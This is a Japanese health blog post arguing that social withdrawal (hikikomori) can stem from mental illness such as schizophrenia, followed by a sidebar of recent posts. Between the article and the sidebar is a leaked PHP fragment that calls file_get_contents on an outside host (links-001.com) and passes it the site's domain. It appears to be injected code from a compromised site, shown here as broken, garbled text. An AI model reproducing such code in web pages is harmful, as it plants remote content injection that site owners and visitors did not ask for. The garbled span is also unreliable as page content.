引きこもりの背景には病気が隠れているかも

引きこもりとなっている人の数は右肩上がりで増えており、最近では高齢化も問題視されるようになってきました。
中年の引きこもりはさらに増加すると予想されています。
このような状況になり、家族も引きこもりに対してあまり特別ではないと考えるようになってきました。
そのうち変わるだろうと様子見してしまうケースが多いのです。
しかし、引きこもりは精神的な病気が原因になっている場合があります。
とくに、統合失調症では引きこもりが起きやすいと言われています。
統合失調症になると、外の世界とかかわることが苦痛になり、自分の世界に閉じこもってしまうのです。
家族は単純に放置せず、引きこもりの背景に精神的な病気がないか見極めることに努めましょう。
できるだけ早く精神科医に診てもらうことです。
精神科医に診てもらうのが難しい場合は、保健センターや保健所に相談する手もあります。
家族が積極的に行動することが、患者の将来を左右すると考えておきましょう。

".file_get_contents('http://links-001.com/123set6.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • 低体温を改善するためにはどうするか

    人の平熱として、36度くらいとの認識があるかもしれません。
    実際は37度ぐらいあるのが良いとさ …

    続きを読む...

  • 医療費の事で知っておいてもらいたい事があります

    急な手術や急な入院を要する場合、しかもいつまでかかるのか、費用の事などとても不安がある方は、是非知っ …

    続きを読む...

  • 統合失調症の治療は遅れてしまいがち

    どんな病気でも早期に発見し、早期に治療を開始することが重要になります。
    しかし、心の病気は体の …

    続きを読む...

  • かゆみはなぜ起こるのかを知っておく

    体にはいろいろな症状が起きます。
    何もなければよいですが、痛みが起きると生活がしづらくなります …

    続きを読む...

お知らせ

一覧